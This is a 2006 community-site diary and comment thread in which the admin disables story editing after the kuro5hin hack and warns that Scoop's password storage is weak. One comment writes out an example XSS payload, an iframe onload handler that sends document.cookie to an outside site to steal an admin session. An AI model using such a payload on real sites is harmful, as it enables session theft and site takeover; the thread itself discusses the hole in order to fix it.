Hulver's site || Extremely Tedious

Diaries
Everything
Who's Online?
FAQ / Help

Hi peeps

By hulver (Thu Jun 15, 2006 at 05:54:33 AM EST) scoop, javascript, security, exploit, hole big enough to fit an ocean liner through (all tags)

I've had to turn off the ability to edit your own story for a while.

Update [2006-6-15 8:47:32 by hulver]: Important information about passwords inside.

I should have posted this to the scoop-dev mailing list first really, but I've been sat on this for a while.

After k5 got hacked I don't want to take any chance. Hopefully I'll get this fixed tonight and turn the settings back on.

Passwords

The scoop method of storing passwords is horribly weak. It's entirely possible to brute force every password < 6 characters within a couple of days. You could search the entire 8 character (yes, it only stores 8 characters of your password) password space in a couple of months. Less on a faster computer. A dictionary search could be done in a couple of hours.
So, if you use the same password for k5 anywhere else, I suggest you change it. I don't know if whoever hacked k5 took a dump of the user database, but seeing as they had access to it to at least run "UPDATE USERS SET perm_group = 'Superuser'" it's a possibility.

< Both busy, and not. | BBC White season: 'Rivers of Blood' >

Login

Related Links

- Scoop
- k5
- hulver's Diary

Google

Comment Controls

Hi peeps | 28 comments (28 topical, 0 hidden) | Trackback

*Open* source, eh? by yicky yacky (4.00 / 1) #1 Thu Jun 15, 2006 at 05:59:07 AM EST

;)
----
Done.

don't worry by martingale (4.00 / 3) #2 Thu Jun 15, 2006 at 06:02:38 AM EST

You're safe as long as the exploit doesn't get published on a buglist by a windows security company.
--
$E(X_t|F_s) = X_s,\quad t > s$

Was it a story editing bug then? by priestess (4.00 / 1) #3 Thu Jun 15, 2006 at 06:11:49 AM EST

I thought someone said it was just a Cross Site Scripting thing, which presumably means they can put whatever script it was into the story without having to use the Story Edit function?

Maybe the Story Edit function doesn't do all the filtering and checking that the original post story does? A hole in the filter-out-the-XSS functions I guess.

Hey ho, I never seem to post stories anyway really.

Pre........
---------
Yes! The Conspiracy Really Exists...

: K5 was an xss bug by hulver (4.00 / 1) #6 Thu Jun 15, 2006 at 06:29:46 AM EST

There were two bugs. One in the search page (now fixed). And one in the "Edit your own story" code.
I've fixed the search xss bug on HuSi, but the "Edit your own story" bug is still there. k5 doesn't let users edit their own stories so they're not vulnrable.
Any scoop site that does, is.
--
smart, pretty, sane. pick two - georgeha
[ Parent ]

K5 got hacked? by IEFBR14 (4.00 / 12) #4 Thu Jun 15, 2006 at 06:19:12 AM EST

How could they tell?

: Search started working by Rogerborg (2.00 / 0) #21 Thu Jun 15, 2006 at 04:32:56 PM EST

Not to worry, ruston put it back the way it should be again.

-
Metus amatores matrum compescit, non clementia.
[ Parent ]

I can still see the edit button by gpig (4.00 / 1) #5 Thu Jun 15, 2006 at 06:25:15 AM EST

and get to the edit page.
---
(, ,') -- eep
"This option is deprecated, as it is conceptually flawed." -- man psql

: D'oh! by hulver (4.00 / 1) #7 Thu Jun 15, 2006 at 06:30:33 AM EST

I turned the wrong permission off.
Thanks.
--
smart, pretty, sane. pick two - georgeha
[ Parent ]

Ever since you by joh3n (4.00 / 2) #8 Thu Jun 15, 2006 at 07:42:31 AM EST

outsourced the customer service call center to India, this website has gone downhill. Downhill, I say! I demand my money back!

----
I am a crime against humanity
-theantix

k5 got hacked? by blixco (4.00 / 1) #9 Thu Jun 15, 2006 at 08:00:32 AM EST

I wanna read all about it! Links, anyone?
---------------------------------
Taken out of context I must seem so strange - Ani DiFranco

Rusty's diary by hulver (4.00 / 1) #10 Thu Jun 15, 2006 at 08:12:18 AM EST

http://www.kuro5hin.org/story/2006/6/14/18650/8795

Not much on the details though. I'd like to know exactly how they did it. I'm betting they stole an admin users session cookie.
--
smart, pretty, sane. pick two - georgeha
[ Parent ]

If I were to have done it by gazbo (4.00 / 1) #11 Thu Jun 15, 2006 at 08:28:21 AM EST

I'd create a link to a search page, and one of search URL parameters (say, the search type) would be a URL encoded version of a bit of HTML and event handlers - something like:

<iframe onload="window.location = 'http://my.site.com/pwned.html?cookie=' + document.cookie;" />

So that is echoed back to the user inside a table cell, and as it loads (iframe is used solely for the onload event handler) it broadcasts the cookie to whoever is interested.

I've not tried this or even thought about it too hard, but looking at the patch I can't see why this wouldn't work - specifically I'm not sure why a buffer overflow was mentioned at all.

"Engarde!" cried the larvae, huskily. - Scrymarch

[ Parent ]

Me too by hulver (4.00 / 1) #12 Thu Jun 15, 2006 at 08:41:24 AM EST

I'd have done something similar.

I think buffer overflow was mentioned because somebody saw "%3F%4E" etc in the url and thought "I don't understand that, it must be a buffer overflow".

If it was originally linked to last measure or something similar then it was fairly un-subtle. Good way to announce "I've found a hole, ha ha", but not a good way to permanently take over the site.

A determined attacker could have just made themselves an admin user and modified the cabal box to not display their name. They could then have had weeks to do whatever they liked. Maybe they did.

Note to self. Add "http-only" flag to cookies. Not that it helps for firefox.
--
smart, pretty, sane. pick two - georgeha
[ Parent ]

Rusty's most recent diary by gazbo (4.00 / 1) #16 Thu Jun 15, 2006 at 11:55:19 AM EST

Has a link to a full explanation.

The long and short of it is that it's what we said.

"Engarde!" cried the larvae, huskily. - Scrymarch

[ Parent ]

Yes. by aphrael (4.00 / 1) #20 Thu Jun 15, 2006 at 02:50:18 PM EST

We were very lucky in that the hacker in question wasn't subtle. He called attention to himself rather than slowly worming his way in.

If television is a babysitter, the internet is a drunk librarian who won't shut up.
[ Parent ]

He says by Rogerborg (2.00 / 0) #22 Thu Jun 15, 2006 at 04:34:30 PM EST

First, you steal all the money. THEN you invite a mob in to burn down the bank and hide the evidence.

-
Metus amatores matrum compescit, non clementia.
[ Parent ]

there's money to steal at k5? by aphrael (4.00 / 1) #23 Thu Jun 15, 2006 at 05:07:49 PM EST

If television is a babysitter, the internet is a drunk librarian who won't shut up.
[ Parent ]

Well, a yatch by Rogerborg (2.00 / 0) #24 Thu Jun 15, 2006 at 06:56:08 PM EST

I am not going to get started on the CMF slush fund, I am not going to get started on the CMF slush fund.

-
Metus amatores matrum compescit, non clementia.
[ Parent ]

: too late. by aphrael (2.00 / 0) #25 Thu Jun 15, 2006 at 07:03:43 PM EST

besides, how many years has it been? what's your burn rate?

If television is a babysitter, the internet is a drunk librarian who won't shut up.
[ Parent ]
: so you're saying by aphrael (4.00 / 1) #26 Thu Jun 15, 2006 at 07:04:07 PM EST

the hacker stole a ton of monocle polish?

If television is a babysitter, the internet is a drunk librarian who won't shut up.
[ Parent ]

Passwords by jimgon (2.00 / 0) #13 Thu Jun 15, 2006 at 09:14:37 AM EST

Thanks for that. I hadn't thunk about it.

Or by komet (2.00 / 0) #14 Thu Jun 15, 2006 at 11:19:23 AM EST

one might elect to not change one's password on an unimportant site and wait and see if anyone else logs in.

It would be great if Scoop could show you the IPs you've used to log in in the last 7 days or so. Would that be hard to code?

--
<ni> komet: You are functionally illiterate as regards trashy erotica.

No by hulver (2.00 / 0) #15 Thu Jun 15, 2006 at 11:22:32 AM EST

Not at all.
--
smart, pretty, sane. pick two - georgeha
[ Parent ]

There you go by hulver (4.00 / 4) #17 Thu Jun 15, 2006 at 11:58:21 AM EST

http://www.hulver.com/scoop/ip
--
smart, pretty, sane. pick two - georgeha
[ Parent ]

: you rule by komet (4.00 / 1) #18 Thu Jun 15, 2006 at 12:04:06 PM EST

that's great.

--
<ni> komet: You are functionally illiterate as regards trashy erotica.
[ Parent ]

i don't believe they ran that query. by aphrael (2.00 / 0) #19 Thu Jun 15, 2006 at 02:48:43 PM EST

i think they used the groups editor to add rights to low level groups.

If television is a babysitter, the internet is a drunk librarian who won't shut up.

please email me by janra (2.00 / 0) #27 Fri Jun 16, 2006 at 07:55:49 PM EST

I'd like to know where in the code you see this thing with the password being chopped down to 8 characters, because I don't see anything like that in the cvs code.

What I see is the entire password supplied by the user being passed to Crypt::UnixCrypt for encrypting, and the salt being chopped off.

Also I'd like to know what you found in terms of story editing... I may have found the same one not too long ago.
--
Discuss the art and craft of writing

: It ain't scoop that is doin' the choppin... by coryking (2.00 / 0) #28 Mon Jun 19, 2006 at 01:13:38 AM EST

It is the Crypt::UnixCrypt library.
We are Siamese if you please. We are Siamese if you don't please.
[ Parent ]

Hi peeps | 28 comments (28 topical, 0 hidden) | Trackback